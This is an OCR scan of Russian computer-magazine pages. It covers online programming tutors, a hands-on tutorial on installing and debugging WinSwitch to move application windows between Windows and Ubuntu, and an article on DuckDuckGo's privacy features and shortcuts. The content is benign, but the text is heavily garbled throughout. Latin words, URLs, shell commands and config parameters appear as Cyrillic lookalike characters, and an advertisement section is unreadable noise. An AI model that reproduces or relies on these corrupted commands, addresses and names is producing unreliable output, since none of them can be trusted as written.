РуЛіоп никак не проверяет твой код, не следит 
за правильностью действий и не предлагает 
задачки для проверки знаний. Весь курс со- 
стоит из семи частей (пять по РуЛіоп и две по 
ІгопРуЛпоп). Забавно, что сам сервис написан 
на БіІѵегІідЫ'е. 




ОНЛАЙН-РЕПЕТИТОР РУТНОИ 



опііперуіііопіиіог.соіп 

Забавный сервис был разработан в рамках 
курса по программированию в известной 
американской кузнице программистов Мас- 
сачусетского технологического института. 

Его идея заключается в том, чтобы визуали- 
зировать выполнения сценариев, написанных 
на РуЛіоп, позволяя пошагово выполнять их 
(вперед-назад) и на каждом шаге просма- 



тривать значения разных структур данных 
(переменных, объектов в куче, фреймов 
стэка). Это может быть произвольный код, 
набранный прямо в браузере, или один из не- 
скольких заранее заготовленных сниппетов, 
взятых из учебной программы РуЛіоп в МІТ. 
Забавно, что здесь есть несколько задачек, 
которые предлагают соискателям на долж- 
ность программистов. С решениями. Сервис 
можно было бы назвать онлайн-отладчиком, 
однако для выполнения сложных сценариев 
использовать его уже нельзя из-за отсутствия 




возможности подключения модулей, выпол- 
нения 1/0-операций и так далее. Кстати, код 
проекта полностью открыт. 



УРОКИ РУТНОМ ОТ 6006І_Е 



сосіе.доодіе.сот/есіи/іапдиадез/доодіе- 

руІІіоп-сІазз/іпсІех.МтІ 

боодіе давно славится тем, что активно ис- 
пользуету себя РуіЬоп. В компании есть даже 
специальный курс, предназначенный для 
людей, у которых пока мало опыта в програм- 
мировании (естественно, они не работают на 



должности разработчиков). Теперь этот курс 
полностью открыт и бесплатен. Он включает 
в себя пошаговые мануалы, видео лекций, 
а также много упражнений для тренировки 
и закрепления материалов. Первые занятия 
касаются базовых понятий в РуіИоп (вроде 
строк и списков), далее — последовательно 
освещается разработка полноценных при- 
ложений, работающих с файлами, процессами 
и НТТР-соединениями. Надо сказать, что 




в Ооодіе этот курс проходит по интенсивному 
сценарию и умещается в два дня. 



ПОПРОБОВАТЬ ТЕХНОЛОГИЮ! 



Интерактивные обучалки, позволяющие 
быстро прочувствовать новую технологию, 
появляются, как грибы после дождя. Ниже я 
привожу еще несколько подобных проектов, 
которые не вошли в сегодняшний обзор, 
но будут очень полезны, если ты хочешь. 



к примеру, познакомиться с набирающими 
оборот функциональными языками 
программирования или новомодными І\Іо5СІІ_ 
базами данных. 

• НазкеІІ: {гѵЬазкеІІ.огд; 

• 5саІа: зітріѵзсаіа.сот; 



• Егіапд: {гѵегіапд.огд; 

• СІоіиге: ігѵ-сіоіиге.огд; 

• МопдоРЬ: ігѵ.топдосІЬ.огд; 

• КесіізРЬ: гѵ.гесііз-сІЬ.сот: 

• С#: Ьіі.Іѵ/А4НК9т; 

• Язык запросов 5СІІ_: зді-ех.ги . 
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ѴАІКАЛЮ ЗіІѴЕЙЗТСШЕ МанОЙѴ С АКТ НАС Р ѴЫ.ЕІ4СІА МАХ ВПООКІАМОЗ ЗТО№ 



миСіи.О-НѴРЕК ЗК.ѴЕК 



ЙІѴЛОЬ ■ СЮ58 ВІ.АСК МИЛЕ О 6 РОКЕ 6 




ІМІ1Ѵ А ПО ЛІАНОО КЕРАМС 201. ПЕН С АОѴѴЕІЬ ШІЧОЙІЫА ПАНАМА КМЕПЕНШИ 




ЧОТАНѴ ГОПСЕР ѴѴНЕЕІ.З НИКВСКСЧІЧС ВР ІАІТЕЧІЛООВКЕ РОМНСТОМ ѴѴ1Ц.0ѴѴ 5ТКІР 



ѴіаиН аиг жоЬдііе Іо ѵіс^ Же сотрісіе 1>пе аі Т5ѴУ ѴѴЬссІа 



ТЗѴѴ іі СІеіІіСаЕесІ ІО Ьеігід ІІТе ѵѵогігі'ь ргетшт ршѵкіег оі йіаддегесі 
шЬееІ арріісайопз ап б Над тоге опе-ріѳее зіаддегесі ъѵМееІ зігез 
{Нэп апу оіИег ѵѵіпееі ЬгапсІ іп іНе ѵѵогЙ, 





РС20ЫЕ 



Антон «Апі» Жуков (іЬикоѵ.айгеаІ. хакер. ги) 



УЧИМСЯ ПЕРЕНОСИТЬ 
ЗАПУЩЕННЫЕ 
ПРОГРАММЫ С ОДНОГО 
КОМПЬЮТЕРА НА ДРУГОЙ 



РАСШАРИТЬ 




ПРИЛОЖЕНИЕ! 
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Расшарить между компьютерами какой-либо документ — просто. 
Предоставить удаленный доступ к рабочему столу — нет проблем. 
Но почему-то до сих пор нельзя просто «поделиться» запущенным 
приложением — взять и быстро перенести его окно из одной 
системы в другую. С появлением проекта ѴѴіпЗѵѵіІсб это стало 
возможным. 
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ЧТО ТАКОЕ ѴѴІМ5ѴѴІТСН? 



Если ты часто имеешь дело с виртуальными машинами, то на- 
верняка знаешь о такой замечательной возможности как перенос 
окон из гостевой операционной системы, запущенной в виртуаль- 
ном окружении, в хостовую ОС (основную систему на компьюте- 
ре). То есть если на виртуальной машине крутится винда, а сама 
виртуальная машина работает на ІІЬипІи, то любые запущенные 
приложения можно «перенести» из ѴѴіпсІоѵѵз в ІІЬипІи. Что самое 
прикольное, — они будут работать так, как если бы были запущены 
самым обычным способом. У меня давно возникла идея реали- 
зовать что-то подобное, но не в плоскости виртуальной машины, 
а с точки зрения протоколов для доступа к удаленному рабочему 
столу. РйР или ѴІЧС без проблем позволяют получить картинку 
с компьютера, который может находиться за тысячи километров, 
и вполне комфортно с ним взаимодействовать. Но зачем нужна 
картинка полного рабочего стола, когда работать приходится 
с одним или двумя конкретными приложениями? Ведь можно же 
отображать только их окна? Удивительно, но реализации такой 
простой идеи долго не было. Пока не появился ѴѴіпЗѵѵіІсЫ 

Как это выглядит? Запустив какое-либо приложение через спе- 
циальный сервер, ты сможешь напрямую перенести его на любое 
устройство, где будет установлен соответствующий клиент. Тут 
нужно понимать — не файлы приложения, а именно окно програм- 
мы, с которым можно работать. Теперь, если нужно продолжить 
работу над текущим документом в МісговоЙ ѴѴогсІ или, скажем, 
над проектом в ѴівиаІ Зіисііо на другом компьютере, можно просто 
«перетащить» туда окно. А поскольку проект кроссплатформен- 
ный, то это еще и отличный способ работать с приложением в том 



случае, когда для нужной системы нет подходящей версии. Или 
вот еще пример: у меня дома рядом стоят компьютер на ѴѴіпсІоѵѵз 
и ноутбук на ІІЬипІи, — теперь я без проблем могу перекидывать 
приложения с одной системы на другую (ну и с одного экрана на 
другой). Хоть даже ѴізиаІ Зіисііо. В результате можно расшарить не 
документ, а приложение. 



УСТАНОВКА 



Теперь, когда понятно, о чем идет речь, попробуем ѴѴіпЗѵѵіІсЬ в дей- 
ствии. Для примера организуем связь между двумя машинами, вы- 
брав в качестве плацдарма две разных ОС — ІІЬипІи Ыаиу ЫагѵѵЬаІ 
(11.04) и ѴѴіпсІоѵѵзХР. 

ѴѴіпсІоѵѵв. Тут все довольно примитивно: на официальном сайте 
ѵѵіп5ѵѵі1сІ"і.огд скачиваем инсталлятор, который все сделает за нас. 
Для корректной работы программе понадобится пгЮМЗ-сервер 
(подробней об тОИЗ смотри во врезке) — если на машине он не 
установлен (а он, скорее всего, не установлен), то инсталлятор 
выдаст соответствующее сообщение и предоставит ссылку на дис- 
трибутив. 

І_іпих. Я, как уже было отмечено выше, буду использовать 
ІІЬипІи, но, само собой, подойдет и любой другой дистрибутив 
тукса. В убунте приложение можно установить через менеджер па- 
кетов, предварительно прописав цифровую подпись репозитория 
с нужными нам пакетами: 

51ІСІО 511 - 

ы^еі: -О - Іі1=1=р5://ыіп5ыі1=сІі.оп^/^р^.а5с | ар1=-кеѵ асИ - 
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Расшарить приложение! 






Открыть 

Запуск от имени.., 



ОреП ьп ЗжіЕсЬ 





Запуск приложения на локальном ѴѴіпБѵѵіісіі сервере через контекстное меню 



Успешное соединение судаленным сервером апІ-ѵЬ 



есііо "сІеЬ ІтЕІір: //ыіпбыііісіі.ог^/ паііііу таіп" > /еііс/арі:/ 
зоигсез . Из* .сі/іл/іпзмііісіі. Іізі: 

арЪ-цеЪ ирсіаіе 

арѣ-^еі: іпзііаіі міпзміѣсЬ 

Проект находится в стадии активной разработки и пока пред- 
ставляет собой решение скорее для гиков, чем для обычных 
людей, поэтому чтобы заставить его работать придется немного 
повозиться с настройкой. 



НАСТРОЙКА 



ѴѴіпЗѵѵіІсЬ состоит из двух частей: сервера и клиента (так назы- 
ваемого апплета). Клиент необходим в системе, чтобы в нее можно 
было «перетащить» приложения — его можно запустить сразу 
после установки через меню. Также при старте апплета автомати- 
чески запускается локальный сервер, чтобы иметь возможность 
расшарить приложения с локальной машины. При запуске клиент 
пытается определить все доступные сервера в сети при помощи 
тОЫ5. 

Конфигурирование как клиента, так и сервера осуществляется 
через конфигурационные файлы. При первом запуске программа 
создает необходимые папки и генерирует конфиги, что может занять 
некоторое время. Как только программа запустилась, идем искать 
конфиги сервера. В *піх они будут в папке -/.ѵѵіпзѵѵіІсЬ/зегѵег/зегѵег. 
сопб а вѴѴіпсіоѵѵз — *\АррІісаІіоп 0аІа\ѴѴіпсІоѵѵ-5ѵѵікЬ\5егѵег\5егѵег. 
сопЕ Рассмотрим наиболее важные для нас параметры. Каждый сер- 
вер имеет свой идентификатор, имя и тип, — все это автоматически 
генерируется при запуске и выглядит примерно так: 

#. Іс(епі:і 1 :у' - -■ _ ‘ 

ІР=" 87967475 38515" 

пате="1:е5І:рс" 

1 :уре="ыогк 5 І:а 1 :іоп" 

Тут можно все оставлять без изменений. Далее в конфи- 
ге идут публичный и приватный ключи, используемые для 



шифрования трафика. Нас же, прежде всего, будет интересо- 
вать параметр I ізіе п о п, определяющий, на каком интерфейсе 
и порту сервер будет ожидать подключений. Его, в принципе, 
тоже можно оставить в состоянии «по умолчанию», но я для 
порядка все же поставил ІІ5Іеп_оп= м *:32123 м (это означает, 
что сервер будет ожидать подключения на 32123 порту на 
всех сетевых интерфейсах). Далее идет еще один интересный 
параметр а 1 1 о ѵѵ_ гооІ ІодіпБ, который в целях безопасности 
рекомендуется установить в значение Раізе. Он определяет, 
можно ли будет подключиться к данному серверу под адми- 
нистратором/рутом. Параметр а 1 1 оѵѵ_го оіа иіЬепІісаІіоп дает 
возможность соединиться с сервером под любым пользова- 
телем, не зная его пароля. Его я тоже отключил из соображе- 
ний безопасности. Следующая интересная секция — тОЫ5 
зеиіпдз — позволяет включать/отключать сервис тОЫ5, 
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Запуск приложения на локальном ѴѴіпБѵѵіісіі сервере 
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Подключение у удаленному рабочему столу ІІЬипІи через ѴЫС 



Сапер, "отправленный" из другой операционной 
системы 



используемый для того, чтобы клиенты при запуске могли 
самостоятельно находить в сети доступные сервера. Если 
установить параметр тОМ5_риЫізЬ в значение Раізе, то 
автоматический поиск серверов будет отключен и их придется 
добавлять вручную. Чтобы клиенты обнаруживали не только 
сервера, но и имя пользователя, под которым можно зайти, 
есть опция тОМ5_риЫІ5Ь_изегпате. Еще одна полезная воз- 
можность — запуск сервера в режиме отладки — может силь- 
но помочь, когда надо прояснить, почему что-то не работает. 
Остальные опции в случае необходимости ты можешь изучить 
сам, так как они достаточно хорошо прокомментированы 
в самом файле. 



ТЕСТ-ДРАЙВ 



Наша задача — запустить какую-нибудь программу и «отпра- 
вить» ее с одного компьютера на другой. В идеальном случае все 
заработает без лишних заморочек. Сначала поработаем на ма- 
шине с ѴѴіпсІоѵѵз ХР. Открываем меню «Пуск» и запускаем клиент 
ѴѴіпсіоѵѵ-БѵѵіісЬ. Как уже обсуждалось выше, при запуске апплета 
автоматически запустился и сервер. Апплет его тут же обнару- 
жил и подключился к нему. Теперь идем в ІІЬипІи. Открываем 
стартовое меню и выбираем «Іпіегпеі -> ѴѴіпсіоѵѵЗѵѵіісЬ». Апплет 
стартует, запускается сервер. Появляется окно, в котором сооб- 
щается, что найден сервер с именем Іезірс и 1 0 =879674753851 5. 
Подтверждаем, что мы хотим с ним соединиться, после чего 
нас попросят ввести пароль для пользователя изег. В винде 



появилось такое же окно, сообщающее, что найден сервер апІ-ѵЬ 
и просьбой ввести пароль пользователя апі для соединения. 
Связь установлена — попробуем отправить приложение с одной 
системы на другую. Идем в линукс, жмем на значок ѴѴі пБѵѵіісЬ 
в трее и выбираем «Біагі Арріісаііоп -> Сатез -> Міпез». Появ- 
ляется аналог виндового сапера (можно чуть поломать голо- 
ву), - теперь мы готовы его расшарить. Опять жмем на иконку 
приложения в трее, выбираем «Міпез -> Бепб Іо изег оп Іезірс». 

И приложение исчезает. Переходим в винду и видим, что оно 
появилось там. Вуаля! 

Надо сказать, что ѴѴіпБѵѵіІсЬ уже содержит список предопреде- 
ленных приложений, рассортированных по категориям, которые 
можно расшарить. Но можно запустить и свое приложение, если 
выбрать «Біагі Арріісаііоп -> Сизіот Соттапб». Для удобства 
эта фича также интегрируется в контекстное меню, так что будет 
достаточно выбрать нужную программу, щелкнуть по ней правой 
клавишей и выбрать «Ореп іп ѴѴіпбоѵѵ БѵѵіІсЬ». Кроме приложений, 
можно получить доступ к самому рабочему столу («Маіп ІІпіх йізріау 
-> ѴІ\ІС Сору»). Помимо непосредственно окна можно форвардить 
также и звук (для этого используется библиотека СБігеатег). 



ОТЛАДКА 



Я не зря сделал выше ремарку «в идеальном случае», — с первого 
раза у меня система не запустилась. Нажав на значок апплета в трее, 
я понял, что он видиттолько локальный сервер. Можно, конечно, до- 
бавить сервер вручную, но тогда весь смысл автоматизации теряется. 



ЧТО ТАКОЕ МОИБ? 



МиКісазІ йМБ (тйМБ) является способом 
использования привычных программных 
интерфейсов йМБ в небольших сетях, где 
нет необходимости в обычном ОМБ-сервере. 
Проще говоря, использование тОМБ 
позволяет клиенту определить ІР-адрес 
хоста без помощи централизованного ОЫБ- 
сервера. Машина, ищущая конкретный 
хост, посылает широковещательный тОМБ- 
запрос. Соответствующий хост отвечает на 
этотзапрос широковещательным ответом. 



«представляя» себя другим участникам сети. 
Таким образом все машины в сети обновляют 
свой тОМБ-кэш и получают информацию и о 
новых хостах/сервисах. Чтобы аннулировать 
свое «представление» (например, в случае 
выключения машины) хост должен отправить 
ге5роп5е-пакетс ТТІ_ = 0. По умолчанию тОМБ 
использует зарезервированную зону «.ІосаІ». 
Протокол тОМБ используюттакие системы 
обнаружения сервисов как Вощоиг (Арріе) 
и АѵаИі (І_іпих). 



Нго СвІгійЁІіЭЛ 




Ручное добавление сервера для подключения 
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Расшарить приложение! 



гой^йпЕ-ѵкк « 

Піс Ейіс ѵі№ бнгсіі тегтіпаі нсір 

апЩагГМЛ*:-* зин зу ■ 

І5У^о| раББЫВггі іог дпі: 
гоо1(йа п г ѵ Ь : - # аѵаИі і - йаетс п[] 



Ручной запуск АѵаЫ-демона 





На данной вкладке можно настроить Главное окно настроек программы 

используемые протоколы 




Сообщение, свидетельствующее об успешном соединении с удаленной ѴѴіпсІоѵѵз-машиной Полный доступ к удаленному рабочему столу ѴѴіпсіоѵѵз-машины из-под ІЛэипІи 



Поэтому вернусь к этому моменту и расскажу, в чем было дело. 

Прежде всего надо бы посмотреть логи. Начал я с винды. Лог 
клиента располагался здесь: *\АррІісаІіоп 0аІа\ѴѴіпсІоѵѵ-5ѵѵіІсІ"і\ 
сІіеЫ\аррІеЫод. Ситуации он не прояснил, так как в нем я не увидел 
информации о какой-либо ошибке. Ну что ж, тогда проверим сервер. 

К сожалению, логов сервера я не нашел. Пообщавшись с документа- 
цией на официальном сайте, было решено следующее: чтобы посмо- 
треть отладочные сообщения сервера, надо запустить его в консоли 
с параметром --сІеЬид-тосІе. Запускаем консоль, переходим в папку 
программы (С:\Ргодгат РіІез\ѴѴіп5ѵѵіІсЫ и запускаем сервер: 

Бшііісіі -Бегѵе г . ехе - -сІеЬие-тосІе 

Покопавшись в сообщениях сервера, ничего криминального 
я снова не обнаружил. Так что, скорее всего, проблема кроется 
в Ыпих-версии. Переходим в линукс. Заходим в консоль и запуска- 
ем уже линуксовый сервер в отладочном режиме: 

ыіпбыііісіі зегѵег --сІеЬіщ-тосІе 

В результате вываливаемся с ошибкой: 

[ЕЕ] 2012 / 23/02 19 : 13:18 ЫіпБшіІгсІіБегѵег . сбескП гиппіп% 
аз гооі: (иісІ= 0 ) із сиггепіііу Ьгокеп 

И снова общение с официальным сайтом прояснило ситуацию. 
Оказывается, сервер и апплет нельзя запускать под рутом (а у меня 
как раз была открыта консоль с правами рута). Ну что ж, попробуем 
проделать тот же трюк под обычным пользователем. Запускаем 
сервер в режиме отладки под обычным пользователем. И ищем 
в консоли все строки, начинающиеся на [йй] (отладочные сообще- 
ния). Пролистывая лог из конца в начало, обратим внимание на 
стек вызовов функций. Похоже, тут произошла какая-то ошибка, 
и программа выкинула нам ЫасеЬаск. Смотрим, что вызывалось 
последним: 

АѵабіРиЫізІіег . іпіі: (ілііпсіош Быііісіі -Гог апі: оп 

ап1:-ѵЬ, 32123., _зІіі-Рі:ег._1:ср. і3 , [ ' изегпате=ап1: ' , 'з5Іі_ 
1:иппе1=Ра1зе ' , , ѵег5Іоп=0.12.11 , , ' Ю=8796747971533 ' ] , -1) 



Немного поясню. АѵаЫ — это система, производящая ана- 
лиз локальной сети на предмет выявления различных сервисов. 

К примеру, можно подключить ноутбук к локальной сети и сразу 
получить информацию об имеющихся принтерах, разделяемых ре- 
сурсах, сервисах обмена сообщениями и прочих услугах. Подобная 
технология существует в Мае 05 X (Репсіегѵоиз, Вощоиг) и отлично 
себя зарекомендовала. АѵаЫ во многом базируется на реализа- 
ции протокола тОЫ5 — Лехтсіпз. Так как в конфиге сервера у нас 
включена возможность обнаружения через тОЫ5, а сам тОЫ5- 
сервер у нас не запущен или не установлен, то автоматическое 
обнаружение и не срабатывает. Смотрим список процессов -дей- 
ствительно, АѵаЫ нет. Но в списке установленных приложений он 
фигурирует, — значит, придется просто запустить его вручную: 
аѵабі-сіаетоп 



Сообщение «Зегѵісе аЫ-ѵЬ (/зегѵісез/исіізкз.зегѵісе) зиссеззЫІІу 
евІаЫізбесІ» свидетельствует о том, что аѵаЫ стартанул успешно. 
Можеттеперь все заработает? Запускаем сервер ѴѴіпЗѵѵіІсЬ заново. 
Сообщение об ошибке инициализации тОЫ5 уже не присутствует. 
На всякий случай проверим лог-файл апплета, который можно 
найти по следующему пути ~/.ѵѵіп5ѵѵіЫЬ/сІіеЫ/аррІеСІод. Там тоже 
обнаруживаются записи, свидетельствующие о наличии проблем 
с тОЫ5. Записей о других критических ошибках — не обнаружено. 
Так как проблему с тОЫ5 мы уже решили, запустив демон абаѵі, то 
теперь вроде бы все должно быть нормально. Выключаем сервер, 
который мы запустили вручную, и идем в меню, чтобы запустить 
апплет. Бинго! С этого момента все заработало. 



ИСПОЛЬЗОВАТЬ ИЛИ НЕТ? 



ѴѴіпБѵѵісЬ - это вполне работоспособная реализация отличной 
идеи, которую я успешно использую уже несколько недель. Уверен, 
что очень скоро появятся коммерческие проекты, эксплуатирую- 
щие подобный подход, но уже с более человеческим интерфейсом, 
простой настройкой и — в идеальном варианте — прозрачным 
переносом окон из одной системы в другую (на случай, если два 
компьютера стоят рядом). Последнее несложно реализовать, если 
скомбинировать проект ѴѴіпЗѵѵіЫЬ и Оігесі Іприі, позволяющий 
расшарить между стоящими рядом компьютерами клавиатуру 
и мышку. □С 
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Мария «МИгіІІ» Нефедова (тіІИІІІсІгеаІ. хакер. ги) 
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«ООООЬЕ 

СЛЕДИТ 

ЗА ТОБОЙ 



МЫ 



НЕТ» 



10 ПРИЧИН ОБРАТИТЬ ВНИМАНИЕ 

на поисковик оііскоискео.сом 




Каким поисковиком ты обычно 
пользуешься? боодіе или 
Яндексом? Или, быть может, ты 
по какой-то причине юзаешь 
Віпд? А ведь инструментов для 
поиска в интернете гораздо 
больше, и помимо закрытых 
коммерческих поисковиков, 
шпионящих за каждым твоим 
шагом, существуют отличные 
гиковские альтернативы. Одна 
из таких альтернатив — йиск- 
Оискбо.сот. 



первый раз о таком слышишь? Я 
тоже. Но ведь так было когда-то и с 
боодіе. бискбискбо — это гибридный 
поисковик, главные черты которого — класс- 
ный поиск, отсутствие поискового спама, 
минимальное количество рекламы (ее можно 
полностью отключить в настройках] и щепе- 
тильное отношение к модному на западе слову 
«ргіѵасу»: бискбискбо не следит за пользова- 
телями, сохраняя их анонимность. Мы нашли 
десять причин, почему его стоит по меньшей 
мере взять на вооружение. 

І Это просто поиск. Давно прошли те 
времена, когда боодіе был просто 
поисковиком, а на «чистой» странице 
выдачи аскетично выводились результаты 
поиска. Сейчас же нас пичкают рекламой 
и дополнительными сервисами. Взятый 
поисковиком путьна социализациютоже 




начинает напрягать. Не надо нам навязывать 
б+ — мы и сами решим, использовать социаль- 
ную сеть от боодіе или нет. бискбискбо в свою 
очередьявляется классическим поисковиком, 
каким был боодіе в самом начале своего 
развития. И чтоздорово, — он отлично ищет 
информацию! Правда, пока только на англий- 
ском языке: с русскоязычным сегментом сети 
унего явные проблемы. Поисковик уже давно 
приглянулся гикам из Силиконовой долины. 

В прошлом году аудитория составляла всего 
200 000 человек в день, а в этом сервис уже 
перешагнул отметку в 1 000 000 посетителей 
ежедневно и, если верить статистике 
( бискбискдо.сот/ігаШс.ЬітІ ), эта цифра 
продолжает расти. Ас ноября 2011 года 
бискбискбо стал поисковиком по умолчанию 
Ыпих МіпИ2. Это, на минуточку, самый 
популярный десктопный дистрибутив Ыпих на 
сегодняшний день. 
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«боодіе следит за тобой. Мы — нет» 




Главная страница Оискйискбо аскетична, чиста и навевает 
мысли о боодіе. 



Вот так продвигал свой поисковик Вайнберг. Этот билборд 
висел в Сан-Франциско, и Гэбриелу это обходилось в 7 000 
$ в месяц. 



Поисковик уже сегодня может похвастаться тем, что был 
удостоен внимания крупных изданий. 



Никакойслежкиза пользователями. 

Если веритьсоздателям, то здесь 
царит полная анонимность. Название 
этой статьи взято из главного лозунга проекта: 
«боодіе следит за тобой. Мы — нет». Замечал 
литы, как реклама в поисковиках умел о 
подстраивается подтезапросы, которыеты 
делал ранее? На сайте ШрѴ/сІопНгаск.из 
приводится отличная демонстрация того, как 
это происходит. Ситуация стала особенно 
актуальной после того, как боодіе сменил свою 
политику конфиденциальности. Скажи честно, 
ты читал новое соглашение о конфиденциаль- 
ности? А между тем с 1 марта 2012 оно вступило 
в силу. Согласно некоторым пунктам, боодіе 
в открытую декларирует сбор телефонных 
логов, то есть номера телефонов, номера 
телефонов вызываемыхабонентов, номера для 
переадресации, дату и время звонков, 
длительностьзвонков, маршрутную информа- 




цию 5М5 и типы звонков. Страшно? А ведь это 
даже не самое скверное, боодіе может собирать 
не только историю твоих звонков, он также 
читает твою переписку и знает все о твоих пере- 
движениях с точностью до пары метров за 
последнюю па ру лет. Благодаря синхронизиро- 
ванным с бтаіі контактам знает твоих друзей 
и знакомых, а основываясь на подписках 
и запросах к поиску — знает о твоих интересах. 
А еще знает о твоих покупках и хранит твои 
документы в боодіе Босз. 

БискБискбо не хранит ІР-адреса, не ведет ло- 
гов пользовательской информации и исполь- 
зует куки только тогда, когда это действи- 
тельно необходимо. Создатель поисковика 
заявляет: «БискБискбо не собирает никакую 
личную информацию пользователей и не 
делится ей. Вот и вся наша политика конфи- 
денциальности». По адресу бисМискдо.сот/ 
ргіѵасу.ЫтІ ты найдешь настоящий манифест 



этого пока небольшого, но гордого поис- 
ковика, в красках повествующий об истории 
поиска в целом и о том, почему сбор данных 
о пользователях — это очень и очень плохо. 



З В БискБискбо практически отсутствует 
спам, которым забиты все коммерче- 
ские поисковики. Надолго ли это, увы, 
неизвестно, но сейчас результаты поиска 
удивляютсвоей чистотой иточностью. На 
сегодня можно сказатьточно, чтоБЕО- 
оптимизаторам БискБискбо пока по барабану, 
и это радует. 



Гибридный поисковикдаетбольше 
результатов. Результаты поиска 
БискБискбоагрегируются из 
пятидесяти разных источников, включая 
ѴаЬоо! БеагсЬ В055, ѴѴікіресІіа, ѴѴоІітат АІрЬа 
и собственного поискового робота. Одним 



СИСТЕМА 600БІЕ5 



Чтобы лучше понять одну из самых 
прогрессивных фишек поисковика — доосііез — 
предлагаем тебе несколько примеров. Начнем 
с технических. 

• Запрос «ір асісігезз» поможеттебе узнать 
свой ІР :). Если же свой собственный 
ІР'шниктебя не интересует, можешь ввести 
в поисковую строку любой уже известный 
адрес, скажем, 64.207.122.151, и БискБискбо 
сообщит тебе, к какой географической точке 
ІР относится, а также покажет ее на карте: 
«64.207.122.151 І5 іп: Сбеуеппе, ѴѴуотіпд, 
ІІпііесі 5*а*ез (82002)». 

• Для чего нужны доосііез изегадепі, ѵѵИоіз 
и им подобные, объяснять, надеюсь, не 
нужно. 

• Запрос вида «11+0153» даст ответ: «сбагасіег 
= 339: ое — І_а*іп зтаІІ Іідаіиге ое; ІІпісосіе = 
11+0153; БесітаІ = 339; НТМІ_ = œ». 

• Для генерации паролей и ключевых фраз 
используй «ра55ѵѵогсі * зігопд» и «раззрИгазе 
* ѴѴ0ГСІ5», где * — любое цифровое значение. 
Также можно генерировать ииісі, диісі. 



Помимо перечисленного наличествуют 
многочисленные полезности, связанные 
с математическими выражениями, 
различными формулами, конвертацией, 
трансформацией и так далее, далее, далее. 
Также поддерживается немало так называемых 
казуальных доосііез: 

• Поиск по датам и фактам. Спроси у Биск- 
Бискбо: «сіеаіб сіаіе о{ Ііпсоіп» (дата смерти 
Линкольна), и вверху страницы поисковой 
выдачи ты увидишь строку «Апгѵѵег: 
Баіигсіау, Аргі1 15, 1865» (Ответ: суббота, 15 
апреля, 1865). 

• Конечно, есть в БискБискбо конвертер 
различных величин и калькулятор, какже 
без них? 

• Имеется множество географических доосі- 
іез, а также доосііез, связанных со временем 
и часовыми поясами. Кстати, поисковик 
пользуется картографическим сервисом 
ОрепБігееІМар. 

Возможен поиск места на карте по заданным 
координатам и по адресам, можно узнать 



точное время в любом городе мира и так далее. 
Например, ответом на запрос «агеа оі сбіпа» 
(площадь Китая) будетточное, как в аптеке: 
«3.705 тііііоп ті2 (здиаге тііез) (ѵѵогісі гапк: 
4*Ы, аззитіпд сЫпа із а соипігу» (3.705 млн. 
квадратных миль (4-я по величине страна 
в мире), если под словом «китай» имелась 
в виду страна). 

• Реализован поиск по различным ІБ, будь 
это трекинг-номер посылки (вводишь 
номер отправления в строку поиска 

и просто нажимаешь 6о!, очень удобно), 
международный стандартный номер 
книги или 15В И, телефон и многое, многое 
другое. 

• Рандомные доосііез особенно забавны. 
Запрос «ИеасІ5 ог *аіІ5» (орел ли решка) — 
не что иное, как возможность подбросить 
виртуальную монетку. А ведь еще есть 
гапсіот питЬег, гоІІ сііе, гапсіот ѵѵогсі и даже 
сакраментальное — ІЬІ5 ог Піаі о г попе. Для 
хардкорщиков предлагается вариант гоІІ 

Зсі 1 2 + 4. 
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словом, йискОискЗо — своеобразная 
оппозиция Соодіе и всем коммерческим 
поисковикам в целом, которая просто не могла 
рано или поздно не появиться. Отдельно стоит 
рассказать про !Ьапд. Данная команда 
позволяет напрямую обращаться к другим 
поисковым машинам и к сотням сайтов. 

Скажем, тебе нужно найти какой-либо 
конкретный товар на «Амазоне». Допустим, это 
часы. Набери в поисковой строке «Іатагоп 
ѵѵаІсЬ» (или просто «!а ѵѵаІсЬ»), и автоматиче- 
ски попадешь на атагоп.сот, в уже готовую 
поисковую подборку с часами. Благодаря этой 
команде можно легко искать на ІуоиІиЬе, 
Кѵѵіиег, Іѵѵікіресііа, в блогах, репозиториях и на 
сотнях других ресурсов. Кстати, также 
работают сокращения: !д (доодіе), И (ітадез), !уІ 
(уоиІиЬе), Іѵѵікі и такдалее. Дополнять список 
Ьапд'ов могут и сами пользователи, для этого 
достаточно заполнить простую форму. Полный 



список Ьапд'ов доступен здесь: сіисксіискао. 
сот/Ьапд.ЬітІ [предупреждаем — он огромен). 

5 Моментальный ответ. Когда в поис- 
ковике можно набрать«гапсІот 
питЬег» (случайное число), «регітеіег 
Ігіапдіе 1.523.2» (пери метр треугольника со 
сторонами 1.5, 2, 3.2), «тсІбіЫз» (посчитать 
ГПСІ5-ХЭШ для слова «1Ыз») итутже получить 
ответ — это называется доосііез. Этоодна из 
самых убойных фишек поисковика, и таких 
доосііез действительно много — кактехниче- 
скихи математико-прогерскихдаки казуаль- 
ных (подробнее читай во врезке). К слову, 
поисковик по многим вопросам сверяется 
сѴѴоІітат АІрЬа — базой знаний и набором 
вычислительныхалгоритмов. Благодаря этому 
есть возможность ввести в строку конкретный 
вопрос и получить на него конкретный ответ 
прямо на странице, не проходя по ссылкам. 



Впрочем, нужно заметить, что в случае 
формулировкизапросов на русскомязыке поля 
«ответ» ты, скорее всего, не увидишь. У ѴѴоІітат 
АІрЬа, к которому обращается йискОискбо, 
с великим и могучим пока не слишком хорошо. 

Гибкая настройка. В настройках 
поисковикаты можешьлегко 
отключить показ рекламы, задать 
регион, включить НТТР5 по умолчанию, 
указать параметры открытия ссылоки даже 
настроить внешний видОРС. Практически 
каждый аспект поведения поисковика можно 
оптимизировать для себя, и это приятно. 

7 Система горячих клавиш. Плохтот 
ресурс, который в наши дни не 
поддерживает хоткеи. У ОискОискбо 
с этим полный порядок: общаться с сайтом 
можно вообще без использования мыши или 
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Реклама в Оискйискбо. Легко отключается в настройках. 
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Примерно сотая часть шорткатов !Ьапд. Их действительно ОЧЕНЬ много. 



Некоторые вариации доосііез. 
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«боодіе следит за тобой. Мы — нет» 



тачпада. Ниже — маленькая подсказка. 
Передвижение по сайту: 

ф или ) — следующий результат; 

Ф или к — предыдущий результат; 

/или И — к поисковой строке; 
езс — выйти из поисковой строки; 

I — наверх; 

т — к первому резул ьтату; 

1 или ! — открыть выпадающее меню !Ьапд. 
Открытые результаты: 

Епіегили I или о — открыть подсвеченный 
результат или сразу открытьсамый первый; 
Сігі/Стсі+Епіег — открыть результат на фоно- 
вой вкладке; 

сі — поискпо конкретному сайту (который вы- 
делен в результатах). 





Работаетпозащищенным протоко- 


10 


8 


лам. У ОискОискбо есть короткое 




доменное имя Шр://сІсІд.дд (это. 





к слову, на 4 символа короче, чем доодіе. 
